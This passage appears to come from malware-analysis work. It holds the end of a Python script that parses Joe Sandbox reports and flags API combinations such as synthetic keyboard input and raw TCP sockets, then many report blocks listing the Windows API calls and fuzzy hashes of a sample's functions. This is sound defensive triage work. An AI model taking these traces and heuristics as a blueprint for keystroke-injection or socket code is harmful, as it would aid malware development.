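            args = [a for a in (m.group("args") or "").split(",") if a]
            cur.apis.append(ApiCall(m.group("name"), m.group("module"), args, m.group("ref"), m.group("sub")))
        elif section == "Similarity" and (m := KV_RE.match(body)):
            cur.meta[m.group("key")] = m.group("val").strip()
            if m.group("key") == "Instruction Fuzzy Hash":  # last line of every block
                blocks.append(cur)
                cur = FuncBlock()
    return blocks

def decode_postmessage_keys(block):
    """Map PostMessageW(hwnd, msg, wParam, lParam) calls to (message, key) names."""
    return [(WM[c.args[1]], VK.get(c.args[2], c.args[2])) for c in block.apis
            if c.name == "PostMessageW" and len(c.args) >= 3 and c.args[1] in WM]

# Hypothetical triage labels (my own, not from the report): API sets worth a look together.
TRIAGE_RULES = {
    "synthetic keyboard input": {"GetKeyboardState", "SetKeyboardState", "PostMessageW"},
    "raw TCP socket": {"socket", "closesocket"},
    "child stdio redirection": {"GetStdHandle", "CreatePipe"},
}

def triage(blocks):
    return [(i, label) for i, b in enumerate(blocks)
            for label, needed in TRIAGE_RULES.items() if needed <= b.direct_api_names()]
```

Calling parse_blocks on the full report text (with the "Download File" link labels stripped, as above) gives one record per function; triage then lists which blocks combine the APIs in each rule, and decode_postmessage_keys shows that the keyboard block posts WM_KEYDOWN for Shift, Control, Alt and the left Windows key in sequence. Calls marked "Part of subcall function" are kept but excluded from direct_api_names so a rule only fires on APIs the function itself invokes.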
            APIs
              • Part of subcall function 0100DDE0: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,0100CF22,?), ref: 0100DDFD
              • Part of subcall function 0100DDE0: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,0100CF22,?), ref: 0100DE16
            • lstrcmpiW.KERNEL32(?,?), ref: 0100CF45
            • MoveFileW.KERNEL32(?,?), ref: 0100CF7F
            • _wcslen.LIBCMT ref: 0100D005
            • _wcslen.LIBCMT ref: 0100D01B
            • SHFileOperationW.SHELL32(?), ref: 0100D061
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: FileFullNamePath_wcslen$MoveOperationlstrcmpi
            • String ID: \*.*
            • API String ID: 3164238972-1173974218
            • Opcode ID: 43c73948f2e1dde1b8e0b91fab5290dd70c287d1ca1e6caa14ab9ac58d0479e1
            • Instruction ID: babd3611152c993f6df670d1c48233091c5fcdecf9eac75ad82aa6edfcdf645b
            • Opcode Fuzzy Hash: 43c73948f2e1dde1b8e0b91fab5290dd70c287d1ca1e6caa14ab9ac58d0479e1
            • Instruction Fuzzy Hash: 164157B19452195EFF53EBA4DA81EED77F8AF44380F0000EAD549EB181EB35A644CB51
            APIs
            • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 01032E1C
            • GetWindowLongW.USER32(00000000,000000F0), ref: 01032E4F
            • GetWindowLongW.USER32(00000000,000000F0), ref: 01032E84
            • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 01032EB6
            • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 01032EE0
            • GetWindowLongW.USER32(00000000,000000F0), ref: 01032EF1
            • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 01032F0B
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: LongWindow$MessageSend
            • String ID:
            • API String ID: 2178440468-0
            • Opcode ID: fcb191c4b1272a409e5995f461c8ae41613303d2f62949dcb2b4725a67958fa8
            • Instruction ID: ae151d61b8347999c64298d71d95cf0b919cc48e70c6fce12c1f08d605faa21f
            • Opcode Fuzzy Hash: fcb191c4b1272a409e5995f461c8ae41613303d2f62949dcb2b4725a67958fa8
            • Instruction Fuzzy Hash: AC312635604250AFEB21CF1CDD85F6537E8FB8A710F1501A5FA80DF2A6CB76A840DB60
            APIs
            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 01007769
            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0100778F
            • SysAllocString.OLEAUT32(00000000), ref: 01007792
            • SysAllocString.OLEAUT32(?), ref: 010077B0
            • SysFreeString.OLEAUT32(?), ref: 010077B9
            • StringFromGUID2.OLE32(?,?,00000028), ref: 010077DE
            • SysAllocString.OLEAUT32(?), ref: 010077EC
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
            • String ID:
            • API String ID: 3761583154-0
            • Opcode ID: a809a4e92d87534bc10cafcc7d46815aba5baef0c8898380cd8bed777e47896c
            • Instruction ID: 72b29b131ddb07f6a90dcaed11169096c3f365d0104ace4392bc3ad4a6ed15b4
            • Opcode Fuzzy Hash: a809a4e92d87534bc10cafcc7d46815aba5baef0c8898380cd8bed777e47896c
            • Instruction Fuzzy Hash: 2421C976600219AFEF11DEACCC44CBB77ECFB09364B004065FA88DB191D678EC418760
            APIs
            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 01007842
            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 01007868
            • SysAllocString.OLEAUT32(00000000), ref: 0100786B
            • SysAllocString.OLEAUT32 ref: 0100788C
            • SysFreeString.OLEAUT32 ref: 01007895
            • StringFromGUID2.OLE32(?,?,00000028), ref: 010078AF
            • SysAllocString.OLEAUT32(?), ref: 010078BD
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
            • String ID:
            • API String ID: 3761583154-0
            • Opcode ID: 2f4fabe73df50c39e1f00f3ab5f2504796599facccb2ecfb33415a46c3533351
            • Instruction ID: 74bf6170cac79a77401ebbf2084e4f5e53beb604643072e3203469ed3b585dba
            • Opcode Fuzzy Hash: 2f4fabe73df50c39e1f00f3ab5f2504796599facccb2ecfb33415a46c3533351
            • Instruction Fuzzy Hash: 07216232604204AFEB119FACDC88DBA77ECEB09760B108125F995DB295DA78ED41CB74
            APIs
            • GetStdHandle.KERNEL32(000000F6), ref: 010105C6
            • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 01010601
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: CreateHandlePipe
            • String ID: nul
            • API String ID: 1424370930-2873401336
            • Opcode ID: 30443faa609958b4dff2a73c2940cb29d05959ef342c3f228305d011e93b60bf
            • Instruction ID: 84982cffede36cbd7e51afac8f408e99dcb529ce5f76faa037497eb0548b71f7
            • Opcode Fuzzy Hash: 30443faa609958b4dff2a73c2940cb29d05959ef342c3f228305d011e93b60bf
            • Instruction Fuzzy Hash: 6E2192755003059BEB209F6DC804A9ABBE8BF89724F304E59F9E1E72DCD7B59590CB20
            APIs
            • GetStdHandle.KERNEL32(0000000C), ref: 010104F2
            • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 0101052E
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: CreateHandlePipe
            • String ID: nul
            • API String ID: 1424370930-2873401336
            • Opcode ID: 5f545cd12447859e71f97c2f1704d94ae85cec084278f25c7c3d25d2ba8198a8
            • Instruction ID: e3de293acbf2ed46c98ad641020d976d86b185f8ae9fe26a2554fa57e97ba0e1
            • Opcode Fuzzy Hash: 5f545cd12447859e71f97c2f1704d94ae85cec084278f25c7c3d25d2ba8198a8
            • Instruction Fuzzy Hash: 06218B71600305EBEB209F29D844A9BBBE8BF44764F204A59F9E1E72DCD7B59590CB20
            APIs
              • Part of subcall function 00FA600E: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00FA604C
              • Part of subcall function 00FA600E: GetStockObject.GDI32(00000011), ref: 00FA6060
              • Part of subcall function 00FA600E: SendMessageW.USER32(00000000,00000030,00000000), ref: 00FA606A
            • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 01034112
            • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 0103411F
            • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 0103412A
            • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 01034139
            • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 01034145
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: MessageSend$CreateObjectStockWindow
            • String ID: Msctls_Progress32
            • API String ID: 1025951953-3636473452
            • Opcode ID: c54332b76f0f0f8f281e0f74d6cf961dfca2353ff8927c035a36ae09a7032f75
            • Instruction ID: 5c557e0b98e710c338766169c0a060f71038fa6868960fcc4798d8123ad95a25
            • Opcode Fuzzy Hash: c54332b76f0f0f8f281e0f74d6cf961dfca2353ff8927c035a36ae09a7032f75
            • Instruction Fuzzy Hash: D911B2B2240219BEEF218E64CC85EE77F9DEF49798F014111FA58E6050C7769C21DBA4
            APIs
              • Part of subcall function 00FDD7A3: _free.LIBCMT ref: 00FDD7CC
            • _free.LIBCMT ref: 00FDD82D
              • Part of subcall function 00FD29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,00FDD7D1,00000000,00000000,00000000,00000000,?,00FDD7F8,00000000,00000007,00000000,?,00FDDBF5,00000000), ref: 00FD29DE
              • Part of subcall function 00FD29C8: GetLastError.KERNEL32(00000000,?,00FDD7D1,00000000,00000000,00000000,00000000,?,00FDD7F8,00000000,00000007,00000000,?,00FDDBF5,00000000,00000000), ref: 00FD29F0
            • _free.LIBCMT ref: 00FDD838
            • _free.LIBCMT ref: 00FDD843
            • _free.LIBCMT ref: 00FDD897
            • _free.LIBCMT ref: 00FDD8A2
            • _free.LIBCMT ref: 00FDD8AD
            • _free.LIBCMT ref: 00FDD8B8
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: _free$ErrorFreeHeapLast
            • String ID:
            • API String ID: 776569668-0
            • Opcode ID: d5e9bbcb1dbdafe4c8d3bd98f36014f41f46dc5d4a3df644b036f3c2391e0fc8
            • Instruction ID: d948f33a78661a4cbf1dc467853e75ff64316e541491c76238148368501e8ba5
            • Opcode Fuzzy Hash: d5e9bbcb1dbdafe4c8d3bd98f36014f41f46dc5d4a3df644b036f3c2391e0fc8
            • Instruction Fuzzy Hash: 14115171540B04AAD621BFB0CC47FCB7BEE6F10700F480826B29DA6292DA69B5057691
            APIs
            • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 0100DA74
            • LoadStringW.USER32(00000000), ref: 0100DA7B
            • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 0100DA91
            • LoadStringW.USER32(00000000), ref: 0100DA98
            • MessageBoxW.USER32(00000000,?,?,00011010), ref: 0100DADC
            Strings
            • %s (%d) : ==> %s: %s %s, xrefs: 0100DAB9
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: HandleLoadModuleString$Message
            • String ID: %s (%d) : ==> %s: %s %s
            • API String ID: 4072794657-3128320259
            • Opcode ID: f0da7684a677e9d9b79bd524a5068ce69113e3a4802504aab148cdc2388ec665
            • Instruction ID: e12751b5d3613034841f3e7813039ea6100c56721d5750043a370d204621212a
            • Opcode Fuzzy Hash: f0da7684a677e9d9b79bd524a5068ce69113e3a4802504aab148cdc2388ec665
            • Instruction Fuzzy Hash: 970162F25002087FF7119BE49E89EEB376CE708301F400496B786F2041EA799E844B74
            APIs
            • InterlockedExchange.KERNEL32(011DF9F0,011DF9F0), ref: 0101097B
            • EnterCriticalSection.KERNEL32(011DF9D0,00000000), ref: 0101098D
            • TerminateThread.KERNEL32(0047002D,000001F6), ref: 0101099B
            • WaitForSingleObject.KERNEL32(0047002D,000003E8), ref: 010109A9
            • CloseHandle.KERNEL32(0047002D), ref: 010109B8
            • InterlockedExchange.KERNEL32(011DF9F0,000001F6), ref: 010109C8
            • LeaveCriticalSection.KERNEL32(011DF9D0), ref: 010109CF
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
            • String ID:
            • API String ID: 3495660284-0
            • Opcode ID: 9b32433c13ad36c019965dd4b0c4f684157b3ed300c8d69558a4de433277f7b6
            • Instruction ID: 8f9c8252d9c04ef0547cdd137cd3c8e93938b2c7bf2a1414f3516011a75cde47
            • Opcode Fuzzy Hash: 9b32433c13ad36c019965dd4b0c4f684157b3ed300c8d69558a4de433277f7b6
            • Instruction Fuzzy Hash: 35F0CD31442512BBF7615B94EF89AD67A69BF05702F401016F285A0898C77A9575CF90
            APIs
            • __allrem.LIBCMT ref: 00FD00BA
            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00FD00D6
            • __allrem.LIBCMT ref: 00FD00ED
            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00FD010B
            • __allrem.LIBCMT ref: 00FD0122
            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00FD0140
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
            • String ID:
            • API String ID: 1992179935-0
            • Opcode ID: c0aa086816e9a6b10c8594d9af3fc1b6618250ddc70608c46d0048b3e4fbc764
            • Instruction ID: 9b6a1ec8fd06acf686c032250ba795e115eebf326f283828ec5508fd86d3885e
            • Opcode Fuzzy Hash: c0aa086816e9a6b10c8594d9af3fc1b6618250ddc70608c46d0048b3e4fbc764
            • Instruction Fuzzy Hash: 5781E872A007069BE7249E29CC42B6AB3EAEF41374F28423FF551D7381EB74D904A790
            APIs
              • Part of subcall function 01023149: select.WSOCK32(00000000,?,00000000,00000000,?,?,?,00000000,?,?,?,0102101C,00000000,?,?,00000000), ref: 01023195
            • __WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 01021DC0
            • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 01021DE1
            • WSAGetLastError.WSOCK32 ref: 01021DF2
            • inet_ntoa.WSOCK32(?), ref: 01021E8C
            • htons.WSOCK32(?,?,?,?,?), ref: 01021EDB
            • _strlen.LIBCMT ref: 01021F35
              • Part of subcall function 010039E8: _strlen.LIBCMT ref: 010039F2
              • Part of subcall function 00FA6D9E: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,00000002,?,?,?,?,00FBCF58,?,?,?), ref: 00FA6DBA
              • Part of subcall function 00FA6D9E: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,?,?,?,00FBCF58,?,?,?), ref: 00FA6DED
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: ByteCharMultiWide_strlen$ErrorLasthtonsinet_ntoaselect
            • String ID:
            • API String ID: 1923757996-0
            • Opcode ID: f679aa8d0f05fb178c43bdd4373f27921bfd3df04f7801434a1afe0a748c77bd
            • Instruction ID: 411d286ebac67907e7545b29ebcbc2ef0f1d46f3d75c54a4c70a0544ddf2a198
            • Opcode Fuzzy Hash: f679aa8d0f05fb178c43bdd4373f27921bfd3df04f7801434a1afe0a748c77bd
            • Instruction Fuzzy Hash: 42A10270504310AFD360EF24C881F2A7BE5AF95318F58899CF5969B2E2CB35ED46CB91
            APIs
            • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00FC82D9,00FC82D9,?,?,?,00FD644F,00000001,00000001,8BE85006), ref: 00FD6258
            • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00FD644F,00000001,00000001,8BE85006,?,?,?), ref: 00FD62DE
            • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,8BE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00FD63D8
            • __freea.LIBCMT ref: 00FD63E5
              • Part of subcall function 00FD3820: RtlAllocateHeap.NTDLL(00000000,?,01071444,?,00FBFDF5,?,?,00FAA976,00000010,01071440,00FA13FC,?,00FA13C6,?,00FA1129), ref: 00FD3852
            • __freea.LIBCMT ref: 00FD63EE
            • __freea.LIBCMT ref: 00FD6413
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: ByteCharMultiWide__freea$AllocateHeap
            • String ID:
            • API String ID: 1414292761-0
            • Opcode ID: bcbac09f690478a437c1633b96ef7c683f0c240bc3f9ebe0e28533ba4c45eee4
            • Instruction ID: dc6ed4f4be8da8de6a74cfb6ab0b3b7894407c2d5c21ff9f3e31f4c5bc8773e0
            • Opcode Fuzzy Hash: bcbac09f690478a437c1633b96ef7c683f0c240bc3f9ebe0e28533ba4c45eee4
            • Instruction Fuzzy Hash: BD51D172A00216ABEB258F64CC81FAF77ABEB44720F1D422AF905D6341DB39DC44E660
            APIs
              • Part of subcall function 00FA9CB3: _wcslen.LIBCMT ref: 00FA9CBD
              • Part of subcall function 0102C998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0102B6AE,?,?), ref: 0102C9B5
              • Part of subcall function 0102C998: _wcslen.LIBCMT ref: 0102C9F1
              • Part of subcall function 0102C998: _wcslen.LIBCMT ref: 0102CA68
              • Part of subcall function 0102C998: _wcslen.LIBCMT ref: 0102CA9E
            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0102BCCA
            • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0102BD25
            • RegCloseKey.ADVAPI32(00000000), ref: 0102BD6A
            • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 0102BD99
            • RegCloseKey.ADVAPI32(?,?,00000000), ref: 0102BDF3
            • RegCloseKey.ADVAPI32(?), ref: 0102BDFF
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpperValue
            • String ID:
            • API String ID: 1120388591-0
            • Opcode ID: abcfd11d8852a1c714059e8f2f2dcdb401282dd4f60995443ceec4f45db7b9b3
            • Instruction ID: d87b695ebb1b34a3f75f4cf3e38ebdde171b5fc97c2fd977630980d3c363540e
            • Opcode Fuzzy Hash: abcfd11d8852a1c714059e8f2f2dcdb401282dd4f60995443ceec4f45db7b9b3
            • Instruction Fuzzy Hash: 4F81D270208241EFD714EF24C881E6ABBE5FF85308F14889DF5958B2A2DB35ED45CB92
            APIs
            • VariantInit.OLEAUT32(00000035), ref: 00FFF7B9
            • SysAllocString.OLEAUT32(00000001), ref: 00FFF860
            • VariantCopy.OLEAUT32(00FFFA64,00000000), ref: 00FFF889
            • VariantClear.OLEAUT32(00FFFA64), ref: 00FFF8AD
            • VariantCopy.OLEAUT32(00FFFA64,00000000), ref: 00FFF8B1
            • VariantClear.OLEAUT32(?), ref: 00FFF8BB
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: Variant$ClearCopy$AllocInitString
            • String ID:
            • API String ID: 3859894641-0
            • Opcode ID: e1ed60d280da1590f2e7c2d4bdf1b0a66f427fb400711cbbb880cb5399008c07
            • Instruction ID: e88477cc965f3d956787ed3a4651f902bd67cdd9ae8049ec840ee6890bdfe276
            • Opcode Fuzzy Hash: e1ed60d280da1590f2e7c2d4bdf1b0a66f427fb400711cbbb880cb5399008c07
            • Instruction Fuzzy Hash: 2051E932A00318BADF306B65DC85B39B3A8EF45710F1484A7EA05DF2A5DBB48C44FB56
            APIs
